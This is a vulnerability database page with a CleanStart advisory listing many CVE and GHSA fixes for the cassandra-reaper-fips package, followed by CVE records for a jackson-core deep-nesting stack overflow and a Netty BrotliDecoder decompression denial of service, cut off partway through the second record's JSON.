Vulnerability-Lookup

Vulnerability from cleanstart

Published

2026-05-18 13:15

Modified

2026-05-13 14:13

Summary

Security fixes for CVE-2015-0886, CVE-2020-8908, CVE-2022-1471, CVE-2022-24823, CVE-2022-38752, CVE-2022-41854, CVE-2023-2976, CVE-2023-34462, CVE-2024-12798, CVE-2024-12801, CVE-2024-13009, CVE-2024-47535, CVE-2024-6763, CVE-2024-8184, CVE-2024-9823, CVE-2025-11143, CVE-2025-24970, CVE-2025-25193, CVE-2025-48734, CVE-2025-48924, CVE-2025-52999, CVE-2025-58057, CVE-2026-1225, CVE-2026-23901, CVE-2026-44431, CVE-2026-44432, ghsa-25qh-j22f-pwp8, ghsa-389x-839f-4rhx, ghsa-3p8m-j85q-pgmj, ghsa-4g8c-wm8x-jfhw, ghsa-5mg8-w23w-74h3, ghsa-6mjq-h674-j845, ghsa-6v67-2wr5-gvf4, ghsa-72hv-8253-57qq, ghsa-7g45-4rm6-3mm3, ghsa-9h6p-92jq-888x, ghsa-9w3m-gqgf-c4p9, ghsa-c4qc-4q9p-m9q9, ghsa-g8m5-722r-8whq, ghsa-gc5v-m9x4-r6x2, ghsa-h46c-h94j-95f3, ghsa-j26w-f9rq-mr2q, ghsa-j288-q9x7-2f5v, ghsa-jc7h-c423-mpjc, ghsa-mf9v-mfxr-j63j, ghsa-mjmj-j48q-9wg2, ghsa-pr98-23f8-jwxv, ghsa-q4rv-gq96-w7c5, ghsa-qccp-gfcp-xxvc, ghsa-qh8g-58pp-2wxh, ghsa-qqpg-mvqg-649v, ghsa-w37g-rhq8-7m4j, ghsa-wjpw-4j6x-6rwh, ghsa-wxr5-93ph-8wr9, ghsa-xq3w-v528-46rv applied in versions: 3.6.1-r0, 3.6.1-r1, 3.6.1-r2, 3.6.1-r3, 3.6.1-r4

Details

Multiple security vulnerabilities affect the cassandra-reaper-fips package. These issues are resolved in later releases. See references for individual vulnerability details.

References

URL

Type

	https://github.com/cleanstart-dev/cleanstart-secu…	ADVISORY
	https://osv.dev/vulnerability/CVE-2015-0886	WEB
	https://osv.dev/vulnerability/CVE-2020-8908	WEB
	https://osv.dev/vulnerability/CVE-2022-1471	WEB
	https://osv.dev/vulnerability/CVE-2022-24823	WEB
	https://osv.dev/vulnerability/CVE-2022-38752	WEB
	https://osv.dev/vulnerability/CVE-2022-41854	WEB
	https://osv.dev/vulnerability/CVE-2023-2976	WEB
	https://osv.dev/vulnerability/CVE-2023-34462	WEB
	https://osv.dev/vulnerability/CVE-2024-12798	WEB
	https://osv.dev/vulnerability/CVE-2024-12801	WEB
	https://osv.dev/vulnerability/CVE-2024-13009	WEB
	https://osv.dev/vulnerability/CVE-2024-47535	WEB
	https://osv.dev/vulnerability/CVE-2024-6763	WEB
	https://osv.dev/vulnerability/CVE-2024-8184	WEB
	https://osv.dev/vulnerability/CVE-2024-9823	WEB
	https://osv.dev/vulnerability/CVE-2025-11143	WEB
	https://osv.dev/vulnerability/CVE-2025-24970	WEB
	https://osv.dev/vulnerability/CVE-2025-25193	WEB
	https://osv.dev/vulnerability/CVE-2025-48734	WEB
	https://osv.dev/vulnerability/CVE-2025-48924	WEB
	https://osv.dev/vulnerability/CVE-2025-52999	WEB
	https://osv.dev/vulnerability/CVE-2025-58057	WEB
	https://osv.dev/vulnerability/CVE-2026-1225	WEB
	https://osv.dev/vulnerability/CVE-2026-23901	WEB
	https://osv.dev/vulnerability/CVE-2026-44431	WEB
	https://osv.dev/vulnerability/CVE-2026-44432	WEB
	https://osv.dev/vulnerability/ghsa-25qh-j22f-pwp8	WEB
	https://osv.dev/vulnerability/ghsa-389x-839f-4rhx	WEB
	https://osv.dev/vulnerability/ghsa-3p8m-j85q-pgmj	WEB
	https://osv.dev/vulnerability/ghsa-4g8c-wm8x-jfhw	WEB
	https://osv.dev/vulnerability/ghsa-5mg8-w23w-74h3	WEB
	https://osv.dev/vulnerability/ghsa-6mjq-h674-j845	WEB
	https://osv.dev/vulnerability/ghsa-6v67-2wr5-gvf4	WEB
	https://osv.dev/vulnerability/ghsa-72hv-8253-57qq	WEB
	https://osv.dev/vulnerability/ghsa-7g45-4rm6-3mm3	WEB
	https://osv.dev/vulnerability/ghsa-9h6p-92jq-888x	WEB
	https://osv.dev/vulnerability/ghsa-9w3m-gqgf-c4p9	WEB
	https://osv.dev/vulnerability/ghsa-c4qc-4q9p-m9q9	WEB
	https://osv.dev/vulnerability/ghsa-g8m5-722r-8whq	WEB
	https://osv.dev/vulnerability/ghsa-gc5v-m9x4-r6x2	WEB
	https://osv.dev/vulnerability/ghsa-h46c-h94j-95f3	WEB
	https://osv.dev/vulnerability/ghsa-j26w-f9rq-mr2q	WEB
	https://osv.dev/vulnerability/ghsa-j288-q9x7-2f5v	WEB
	https://osv.dev/vulnerability/ghsa-jc7h-c423-mpjc	WEB
	https://osv.dev/vulnerability/ghsa-mf9v-mfxr-j63j	WEB
	https://osv.dev/vulnerability/ghsa-mjmj-j48q-9wg2	WEB
	https://osv.dev/vulnerability/ghsa-pr98-23f8-jwxv	WEB
	https://osv.dev/vulnerability/ghsa-q4rv-gq96-w7c5	WEB
	https://osv.dev/vulnerability/ghsa-qccp-gfcp-xxvc	WEB
	https://osv.dev/vulnerability/ghsa-qh8g-58pp-2wxh	WEB
	https://osv.dev/vulnerability/ghsa-qqpg-mvqg-649v	WEB
	https://osv.dev/vulnerability/ghsa-w37g-rhq8-7m4j	WEB
	https://osv.dev/vulnerability/ghsa-wjpw-4j6x-6rwh	WEB
	https://osv.dev/vulnerability/ghsa-wxr5-93ph-8wr9	WEB
	https://osv.dev/vulnerability/ghsa-xq3w-v528-46rv	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2015-0886	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2020-8908	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-1471	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-24823	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-38752	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-41854	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2023-2976	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2023-34462	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-12798	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-12801	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-13009	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-47535	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-6763	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-8184	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-9823	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-11143	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-24970	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-25193	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-48734	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-48924	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-52999	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-58057	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-1225	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-23901	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44431	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44432	WEB

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "cassandra-reaper-fips"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.1-r4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the cassandra-reaper-fips package. These issues are resolved in later releases. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-GH89210",
  "modified": "2026-05-13T14:13:05Z",
  "published": "2026-05-18T13:15:02.086653Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-GH89210.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2015-0886"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2020-8908"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-1471"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-24823"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-38752"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-41854"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2023-2976"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2023-34462"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-12798"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-12801"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-13009"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-47535"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-6763"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-8184"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-9823"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-11143"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-24970"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-25193"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-48734"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-48924"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-52999"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-58057"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-1225"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-23901"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44431"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44432"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-25qh-j22f-pwp8"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-389x-839f-4rhx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3p8m-j85q-pgmj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-4g8c-wm8x-jfhw"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5mg8-w23w-74h3"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-6mjq-h674-j845"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-6v67-2wr5-gvf4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-72hv-8253-57qq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-7g45-4rm6-3mm3"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-9h6p-92jq-888x"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-9w3m-gqgf-c4p9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-c4qc-4q9p-m9q9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-g8m5-722r-8whq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-gc5v-m9x4-r6x2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-h46c-h94j-95f3"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-j26w-f9rq-mr2q"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-j288-q9x7-2f5v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-jc7h-c423-mpjc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-mf9v-mfxr-j63j"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-mjmj-j48q-9wg2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-pr98-23f8-jwxv"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q4rv-gq96-w7c5"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qccp-gfcp-xxvc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qh8g-58pp-2wxh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qqpg-mvqg-649v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-w37g-rhq8-7m4j"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-wjpw-4j6x-6rwh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-wxr5-93ph-8wr9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xq3w-v528-46rv"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0886"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8908"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1471"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24823"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38752"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41854"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2976"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34462"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12798"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12801"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13009"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47535"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6763"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8184"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9823"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11143"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24970"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25193"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48734"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52999"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58057"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1225"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23901"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "summary": "Security fixes for CVE-2015-0886, CVE-2020-8908, CVE-2022-1471, CVE-2022-24823, CVE-2022-38752, CVE-2022-41854, CVE-2023-2976, CVE-2023-34462, CVE-2024-12798, CVE-2024-12801, CVE-2024-13009, CVE-2024-47535, CVE-2024-6763, CVE-2024-8184, CVE-2024-9823, CVE-2025-11143, CVE-2025-24970, CVE-2025-25193, CVE-2025-48734, CVE-2025-48924, CVE-2025-52999, CVE-2025-58057, CVE-2026-1225, CVE-2026-23901, CVE-2026-44431, CVE-2026-44432, ghsa-25qh-j22f-pwp8, ghsa-389x-839f-4rhx, ghsa-3p8m-j85q-pgmj, ghsa-4g8c-wm8x-jfhw, ghsa-5mg8-w23w-74h3, ghsa-6mjq-h674-j845, ghsa-6v67-2wr5-gvf4, ghsa-72hv-8253-57qq, ghsa-7g45-4rm6-3mm3, ghsa-9h6p-92jq-888x, ghsa-9w3m-gqgf-c4p9, ghsa-c4qc-4q9p-m9q9, ghsa-g8m5-722r-8whq, ghsa-gc5v-m9x4-r6x2, ghsa-h46c-h94j-95f3, ghsa-j26w-f9rq-mr2q, ghsa-j288-q9x7-2f5v, ghsa-jc7h-c423-mpjc, ghsa-mf9v-mfxr-j63j, ghsa-mjmj-j48q-9wg2, ghsa-pr98-23f8-jwxv, ghsa-q4rv-gq96-w7c5, ghsa-qccp-gfcp-xxvc, ghsa-qh8g-58pp-2wxh, ghsa-qqpg-mvqg-649v, ghsa-w37g-rhq8-7m4j, ghsa-wjpw-4j6x-6rwh, ghsa-wxr5-93ph-8wr9, ghsa-xq3w-v528-46rv applied in versions: 3.6.1-r0, 3.6.1-r1, 3.6.1-r2, 3.6.1-r3, 3.6.1-r4",
  "upstream": [
    "CVE-2015-0886",
    "CVE-2020-8908",
    "CVE-2022-1471",
    "CVE-2022-24823",
    "CVE-2022-38752",
    "CVE-2022-41854",
    "CVE-2023-2976",
    "CVE-2023-34462",
    "CVE-2024-12798",
    "CVE-2024-12801",
    "CVE-2024-13009",
    "CVE-2024-47535",
    "CVE-2024-6763",
    "CVE-2024-8184",
    "CVE-2024-9823",
    "CVE-2025-11143",
    "CVE-2025-24970",
    "CVE-2025-25193",
    "CVE-2025-48734",
    "CVE-2025-48924",
    "CVE-2025-52999",
    "CVE-2025-58057",
    "CVE-2026-1225",
    "CVE-2026-23901",
    "CVE-2026-44431",
    "CVE-2026-44432",
    "ghsa-25qh-j22f-pwp8",
    "ghsa-389x-839f-4rhx",
    "ghsa-3p8m-j85q-pgmj",
    "ghsa-4g8c-wm8x-jfhw",
    "ghsa-5mg8-w23w-74h3",
    "ghsa-6mjq-h674-j845",
    "ghsa-6v67-2wr5-gvf4",
    "ghsa-72hv-8253-57qq",
    "ghsa-7g45-4rm6-3mm3",
    "ghsa-9h6p-92jq-888x",
    "ghsa-9w3m-gqgf-c4p9",
    "ghsa-c4qc-4q9p-m9q9",
    "ghsa-g8m5-722r-8whq",
    "ghsa-gc5v-m9x4-r6x2",
    "ghsa-h46c-h94j-95f3",
    "ghsa-j26w-f9rq-mr2q",
    "ghsa-j288-q9x7-2f5v",
    "ghsa-jc7h-c423-mpjc",
    "ghsa-mf9v-mfxr-j63j",
    "ghsa-mjmj-j48q-9wg2",
    "ghsa-pr98-23f8-jwxv",
    "ghsa-q4rv-gq96-w7c5",
    "ghsa-qccp-gfcp-xxvc",
    "ghsa-qh8g-58pp-2wxh",
    "ghsa-qqpg-mvqg-649v",
    "ghsa-w37g-rhq8-7m4j",
    "ghsa-wjpw-4j6x-6rwh",
    "ghsa-wxr5-93ph-8wr9",
    "ghsa-xq3w-v528-46rv"
  ]
}

CVE-2025-52999 (GCVE-0-2025-52999)

Vulnerability from cvelistv5 – Published: 2025-06-25 17:02 – Updated: 2025-06-25 18:04

Title

jackson-core Has Potential for StackoverflowError if user parses an input file that contains very deeply nested data

Summary

jackson-core contains core low-level incremental ("streaming") parser and generator abstractions used by Jackson Data Processor. In versions prior to 2.15.0, if a user parses an input file and it has deeply nested data, Jackson could end up throwing a StackoverflowError if the depth is particularly large. jackson-core 2.15.0 contains a configurable limit for how deep Jackson will traverse in an input document, defaulting to an allowable depth of 1000. jackson-core will throw a StreamConstraintsException if the limit is reached. jackson-databind also benefits from this change because it uses jackson-core to parse JSON inputs. As a workaround, users should avoid parsing input files from untrusted sources.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE

CWE-121 - Stack-based Buffer Overflow

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/FasterXML/jackson-core/securit…	x_refsource_CONFIRM
https://github.com/FasterXML/jackson-core/pull/943	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
FasterXML	jackson-core	Affected: < 2.15.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-52999",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-06-25T18:04:07.206576Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-06-25T18:04:23.296Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "jackson-core",
          "vendor": "FasterXML",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.15.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "jackson-core contains core low-level incremental (\"streaming\") parser and generator abstractions used by Jackson Data Processor. In versions prior to 2.15.0, if a user parses an input file and it has deeply nested data, Jackson could end up throwing a StackoverflowError if the depth is particularly large. jackson-core 2.15.0 contains a configurable limit for how deep Jackson will traverse in an input document, defaulting to an allowable depth of 1000. jackson-core will throw a StreamConstraintsException if the limit is reached. jackson-databind also benefits from this change because it uses jackson-core to parse JSON inputs. As a workaround, users should avoid parsing input files from untrusted sources."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-121",
              "description": "CWE-121: Stack-based Buffer Overflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-06-25T17:02:57.428Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3"
        },
        {
          "name": "https://github.com/FasterXML/jackson-core/pull/943",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/FasterXML/jackson-core/pull/943"
        }
      ],
      "source": {
        "advisory": "GHSA-h46c-h94j-95f3",
        "discovery": "UNKNOWN"
      },
      "title": "jackson-core Has Potential for StackoverflowError if user parses an input file that contains very deeply nested data"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-52999",
    "datePublished": "2025-06-25T17:02:57.428Z",
    "dateReserved": "2025-06-24T03:50:36.795Z",
    "dateUpdated": "2025-06-25T18:04:23.296Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2025-58057 (GCVE-0-2025-58057)

Vulnerability from cvelistv5 – Published: 2025-09-03 21:46 – Updated: 2025-09-04 19:59

Title

Netty's BrotliDecoder is vulnerable to DoS via zip bomb style attack

Summary

Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In netty-codec-compression versions 4.1.124.Final and below, and netty-codec versions 4.2.4.Final and below, when supplied with specially crafted input, BrotliDecoder and certain other decompression decoders will allocate a large number of reachable byte buffers, which can lead to denial of service. BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is fixed in versions 4.1.125.Final of netty-codec and 4.2.5.Final of netty-codec-compression.

Severity ?

6.9 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE

CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/netty/netty/security/advisorie…	x_refsource_CONFIRM
https://github.com/netty/netty/commit/9d804c54ce9…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
netty	netty	Affected: <= 4.1.124.Final, < 4.1.125.Final Affected: <= 4.2.4.Final, < 4.2.5.Final

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-58057",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-09-04T19:59:14.684509Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-09-04T19:59:23.458Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "netty",
          "vendor": "netty",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 4.1.124.Final, \u003c 4.1.125.Final"
            },
            {
              "status": "affected",
              "version": "\u003c= 4.2.4.Final,  \u003c 4.2.5.Final"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers \u0026 clients. In netty-codec-compression versions 4.1.124.Final and below, and netty-codec versions 4.2.4.Final and below, when supplied with specially crafted input, BrotliDecoder and certain other decompression decoders will allocate a large number of reachable byte buffers, which can lead to denial of service. BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is fixed in versions 4.1.125.Final of netty-codec and 4.2.5.Final of netty-codec-compression."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-409",
              "description": "CWE-409: Improper Handling of Highly Compressed Data (Data Amplification)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-03T21:46:49.928Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/netty/netty/security/advisories/GHSA-3p8m-j85q-pgmj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/netty/netty/security/advisories/GHSA-3p8m-j85q-pgmj"
        },
        {
          "name": "https://github.com/netty/netty/commit/9d804c54ce962408ae6418255a83a13924f7145d",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/netty/netty/commit/9d804c54ce962408ae6418255a83a13924f7145d"
        }
      ],
      "source": {
        "advisory": "GHSA-3p8m-j85q-pgmj",
        "discovery": "UNKNOWN"
      },
      "title": "Netty\u0027s BrotliDecoder is vulnerable to DoS via zip bomb style attack"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-58057",
    "datePublished": "2025-09-03T21:46:49.928Z",
    "dateReserved": "2025-08-22T14:30:32.221Z",
    "dateUpdated": "2025-09-04T19:59:23.458Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
